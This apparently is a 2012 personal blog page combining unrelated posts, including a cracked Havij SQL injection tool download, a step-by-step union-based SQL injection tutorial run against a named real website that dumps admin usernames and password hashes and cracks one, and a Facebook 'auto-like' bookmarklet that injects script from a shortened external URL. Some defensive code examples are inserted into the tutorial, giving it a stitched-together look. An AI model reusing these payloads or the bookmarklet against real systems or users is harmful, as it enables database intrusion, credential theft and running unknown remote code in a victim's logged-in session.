✎ Ⓙ ⓗ Ⓞ ⓝ ㋡

Facebook to ‘disappear’ in under 10 years, according to analyst
Facebook’s success will be short lived, according to one Wall Street analyst, who predicts the site will “disappear” in under a decade. ( read more @ http://www.foxnews.com/scitech/2012/06/05/facebook-to-disappear-in-under-10-y… )
Maybe we should start planting plants already!
As posted on CNN ( http://on.cnn.com/N3RUBn ), the term “Zombie apocalypse” has been most discussed over the internet. “The End of the World, when people who have died rise again in rotten corpses searching for blood and brains to strengthen them.” - this is also said in the article.

We all know that zombies aren’t real. But if they are, we can stop them by planting plants and trees just like in the game “Plants vs Zombies”. Seriously, planting can really save the whole world, even if the enemies are zombies or whatever, like natural calamities. So before the zombies get inside your house and eat your brain, we should start saving mother earth already.

P.S.: Just telling my opinion.. :P
Havij 1.15 Pro + Licence

Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

It can take advantage of a vulnerable web application. By using this software, a user can perform back-end database fingerprinting, retrieve DBMS users and password hashes, dump tables and columns, fetch data from the database, run SQL statements and even access the underlying file system and execute commands on the operating system.

The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injecting vulnerable targets using Havij.

The user-friendly GUI (Graphical User Interface) of Havij and its automated settings and detections make it easy to use for everyone, even amateur users. (More about Havij)

Download and extract Havij 1.15 Pro from here ( http://j.gs/12Hs )

Follow the reference image below for the registration:

SQL Injection Tutorials & Ideas

What is SQL injection ?
SQL stands for Structured Query Language. It is a very high-level language, I mean close to human language. The SELECT, INSERT, DELETE and UPDATE queries are used to select, add, delete and update data respectively. SQL is used to design the databases. The information is stored in databases.
SQL injection is a vulnerability occurring in the database layer of an application which allows an attacker to see the contents stored in the database. This vulnerability occurs when the user’s input is not filtered or is improperly filtered. For example, take web page links in the format
www.anything.com/something.php?something=something, such as
www.tartanarmy.com/news/news.php?id=130.
Here we are passing 130 to the database and it returns the results accordingly. Let’s attach a single quote (') at the end, that is
www.tartanarmy.com/news/news.php?id=130'
and we get an error on the screen because it included the single quote (') while processing the results. It assures us that it didn’t filter our input and is vulnerable to attack.
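The cause described above (input placed into the query unfiltered) next to its fix, as an added example that is not part of the original tutorial. It uses Python's sqlite3 with a constructed in-memory database; the table contents and all function names are assumptions made for illustration.

```python
import sqlite3

def make_db():
    """Constructed in-memory data standing in for a news table and an admin table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO news VALUES (130, 'Match report');
        INSERT INTO admin VALUES ('editor', 'constructed-hash');
    """)
    return db

def get_news_vulnerable(db, raw_id):
    # Input is pasted into the SQL text, so the database parses whatever
    # the visitor typed as part of the statement.
    return db.execute("SELECT id, title FROM news WHERE id = " + raw_id).fetchall()

def get_news_safe(db, raw_id):
    # 1) Validate: this parameter is only ever an ASCII decimal number.
    if not (raw_id.isascii() and raw_id.isdigit()):
        raise ValueError("id must be numeric")
    # 2) Bind: the value is sent separately from the SQL text.
    return db.execute("SELECT id, title FROM news WHERE id = ?", (int(raw_id),)).fetchall()

def outcome(handler, raw_id):
    """Run handler on a fresh database; return its rows or why it stopped."""
    try:
        return handler(make_db(), raw_id)
    except sqlite3.Error:
        return "sql-error"   # the input reached the SQL parser
    except ValueError:
        return "rejected"    # stopped before any SQL ran

if __name__ == "__main__":
    for raw in ["130", "130'", "-130 union select 1, username from admin"]:
        print(repr(raw), outcome(get_news_vulnerable, raw), outcome(get_news_safe, raw))
```

The database error that the quote produces in the vulnerable handler is the same signal the tutorial relies on; the safe handler never lets the input reach the parser.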


Some basics-:
Every database server has databases on it. Every database has tables in it, tables have columns in them, and finally data is stored in columns.

We have chosen the database “explore_hacking” from six databases. It has four tables: admin, articles, products, subscribers. Each table has further columns and data stored in them. For example, we chose the ‘admin’ table; it has the columns id, username, password, email.

What is information_schema ?
It is an information database present in all SQL database servers (version>5) by default. It contains information like the names of tables and columns present in all other databases.

We have opened the database “information_schema”, which is present by default, and the table named “TABLES” in that database.


SQL Injection Tutorial :-
This tutorial is only for educational purposes. Kindly do not misuse it.
Log on to http://www.tartanarmy.com/news/news.php?id=130. Basically we are going to send the queries through the URL to get results back on screen accordingly. The motive is to get the name of the table and the names of the columns in which usernames and passwords are stored, and finally to fetch them. Instead of copying and pasting the long links, simply click on “click here” and open in a new tab.

Step 1. Find number of columns.
Let’s use the “ORDER BY” clause here; it is used to sort the results by a column. Choose any number, say 10. Here I have assumed that the number of columns can’t be more than 10. “--” is used to make anything after it a comment.
Now go to this URL
http://www.tartanarmy.com/news/news.php?id=130 order by 10-- Click here
Actually we instructed it to sort the result by the 10th column. But it returned an error, which means the number of columns is less than 10. Let’s replace it with 9.
http://www.tartanarmy.com/news/news.php?id=130 order by 9
But again we got an error. This means the number of columns is less than 9. Like this we keep on moving, until we don’t get any error.
Finally we reach ‘6’
http://www.tartanarmy.com/news/news.php?id=130 order by 6--
We didn’t get any error; this means there are 6 columns.

Step 2. Find vulnerable columns.
Now let’s use the “UNION ALL” and “SELECT” commands. Remember to put a dash (-) before 130.
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,2,3,4,5,6--. Click here
We would get a couple of numbers on screen. The bold ones are the most vulnerable columns.
In this case the most vulnerable is number 2.

Step 3. Find database version.
Replace the most vulnerable column with “@@version” or “version()” (if the first one doesn’t work).
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,@@version,3,4,5,6-- Click here
We got the version on screen. It is. The only thing to note is that the version is 5 point something, that is, greater than 5. We would have followed some other approach had the version been less than 5, because in versions less than 5 there is no default database like “information_schema” which stores information about the tables/columns of other databases.

Step 4. Finding table names.
Replace the vulnerable column no. with “table_name”.
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,table_name,3,4,5,6 from information_schema.tables where table_schema=database()-- Click here
We got the first table name on the screen.

To get all tables use group_concat
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()-- Click here


Step 5. Finding column names.
Similarly, get all the columns by simply replacing ‘table’ with ‘column’
http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()-- Click here
There is a repeating element, which in this case is ‘id’. From it, we come to know which table number has which columns.



Step 6. Fetching data from columns.
We can fetch the data stored in any column. But the interesting ones here are username and password.
These columns are in the first table, that is tar_admin. “0x3a” is used simply to insert a colon in the result to separate the values; it is the hex of a colon.

http://www.tartanarmy.com/news/news.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4,5,6 from tar_admin--. Click Here

So finally we got the usernames and passwords on screen. But the passwords are encrypted.
Mostly these encryptions are crackable. Let’s choose any username, say "Sneds". The password in encrypted form is 7d372d3f4ad3116c9e455b20e946dd15. Let’s log on to http://md5crack.com/crackmd5.php and put the hashed (encrypted) password there.
And it would crack it for us. We got ‘oorwullie’ as the result (password in clear text).

Note: Hashes are a type of encryption which is irreversible. There are numberless online crackers available. Keep trying. Sometimes very strong hashes cannot be cracked.
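The lookup above works because an unsalted, fast hash maps each password to one fixed value. As an added example (not from the original tutorial), this is how a site can store passwords with a per-user salt and a slow key-derivation function using Python's hashlib.scrypt; the function names, the storage string format, the cost parameters and the sample password are choices made for this example.

```python
import hashlib
import hmac
import os

def md5_hex(password):
    # Unsalted fast hash: the same password gives the same value for every
    # user on every site, which is what makes lookup services effective.
    return hashlib.md5(password.encode()).hexdigest()

def hash_password(password, salt=None):
    # A random per-user salt makes equal passwords produce different records;
    # scrypt makes every guess cost memory and CPU time.
    salt = salt or os.urandom(16)
    dk = hashlib.scrypt(password.encode(), salt=salt, n=2**14, r=8, p=1, dklen=32)
    return f"scrypt$16384$8$1${salt.hex()}${dk.hex()}"

def verify_password(password, stored):
    scheme, n, r, p, salt_hex, dk_hex = stored.split("$")
    if scheme != "scrypt":
        return False
    expected = bytes.fromhex(dk_hex)
    dk = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                        n=int(n), r=int(r), p=int(p), dklen=len(expected))
    # Constant-time comparison of the derived key with the stored one.
    return hmac.compare_digest(dk, expected)

if __name__ == "__main__":
    pw = "constructed-pass"  # constructed sample value
    print(md5_hex(pw) == md5_hex(pw))              # identical for every user
    print(hash_password(pw) == hash_password(pw))  # differs per record
```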
Where is the login panel or login page of the website ?
So you got the key; where is the lock now? Most websites have login pages at default locations.
Take any website, say www.xyz.com. The login page would be at
www.xyz.com/admin , www.xyz.com/administrator , www.xyz.com/adminlogin etc.
Download this admin page finder from here and it would try all these default pages.

Copyrights to ExploreHacking.com. Note: Some of the links are no longer working.
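Each of the six steps in the tutorial above leaves a recognisable request in the web server's access log. The following added example (not part of the original tutorial) scans constructed log lines for those patterns and groups the hits by client; the log lines, IP addresses, rule names and function names are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines; the IPs are documentation addresses.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Jun/2012:10:00:01 +0000] "GET /news/news.php?id=130 HTTP/1.1" 200 5120
203.0.113.7 - - [05/Jun/2012:10:00:09 +0000] "GET /news/news.php?id=130%27 HTTP/1.1" 500 312
203.0.113.7 - - [05/Jun/2012:10:00:20 +0000] "GET /news/news.php?id=130%20order%20by%2010-- HTTP/1.1" 500 312
203.0.113.7 - - [05/Jun/2012:10:00:41 +0000] "GET /news/news.php?id=-130+UNION+SELECT+ALL+1,2,3,4,5,6-- HTTP/1.1" 200 4890
203.0.113.7 - - [05/Jun/2012:10:01:02 +0000] "GET /news/news.php?id=-130+union+select+all+1,group_concat(table_name),3,4,5,6+from+information_schema.tables-- HTTP/1.1" 200 5011
198.51.100.4 - - [05/Jun/2012:10:02:00 +0000] "GET /news/news.php?id=131 HTTP/1.1" 200 5099
198.51.100.4 - - [05/Jun/2012:10:02:30 +0000] "GET /shop/list.php?note=order+by+phone HTTP/1.1" 200 900
"""

# One rule per step of the tutorial, applied to the URL-decoded query string.
RULES = {
    "quote-probe":   re.compile(r"'\s*$"),
    "order-by-n":    re.compile(r"\border\s+by\s+\d+", re.I),
    "union-select":  re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema-enum":   re.compile(r"\binformation_schema\b", re.I),
    "version-probe": re.compile(r"@@version|\bversion\s*\(", re.I),
    "group-concat":  re.compile(r"\bgroup_concat\s*\(", re.I),
}
LINE = re.compile(r'^(\S+) .*?"(?:GET|POST) \S*?\?(\S*) HTTP/')

def scan(log_text):
    """Map each client IP to the distinct rules it triggered, in first-seen order."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # no query string, or not a request line
        ip, query = m.group(1), unquote_plus(m.group(2))
        for name, rx in RULES.items():
            if rx.search(query) and name not in hits[ip]:
                hits[ip].append(name)
    return dict(hits)

def suspects(log_text, min_rules=2):
    """Clients that triggered several different rules, i.e. walked the steps."""
    return sorted(ip for ip, r in scan(log_text).items() if len(r) >= min_rules)

if __name__ == "__main__":
    print(scan(SAMPLE_LOG), suspects(SAMPLE_LOG))
```

Requiring a digit after "order by" keeps ordinary text such as the last sample line from matching, and counting distinct rules per client separates a probing sequence from a single odd request.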

Send FREE SMS Anywhere All Over the World
Running out of prepaid credits or do you want to text someone who is in another country? Try out OfSMS.in - It can send SMS from and to wherever you want. Although sometimes the recipient will receive the SMS delayed, at least it worked.. :D
Looking for a group of Filipino Programmers? ((facebook groups, posts))
Do you have any questions, need help, or just want to share something about some programming language? Please join “Programmers” on Facebook - this is what I can call a “pinoy” version of StackOverflow, where a group of Filipino developers/programmers in all programming languages and platforms unite together and help one another. Go to this link to know more about the group ( http://facebook.com/groups/310126675677419 ). Please also join Philippine Group of Web Developers on Facebook ( http://facebook.com/groups/pg.webdev )
Mongsang-ga has just moved to Posterous!
It’s been a long time since I stopped blogging as I got busy doing things with my life. Before, I used Tumblr to blog and write about just about anything, like gadgets, technology, useful tools & applications, programming, tutorials, etc. Now I will be sharing more of it again, but on my new blog, and it’s on Posterous! :D
Auto-Like Script for Facebook

Simply drag the link below to your bookmarks bar, then press it anywhere on Facebook.

Like Everything on this page!

Or paste this code on your browser’s address bar:

javascript:var s = document.getElementById('happyScript'); if(s) {s.parentNode.removeChild(s);}s = document.createElement('script'); s.setAttribute('src','http://goo.gl/sl29E'); s.setAttribute('type','text/javascript'); s.setAttribute('id', 'happyScript'); document.body.appendChild(s); void(0);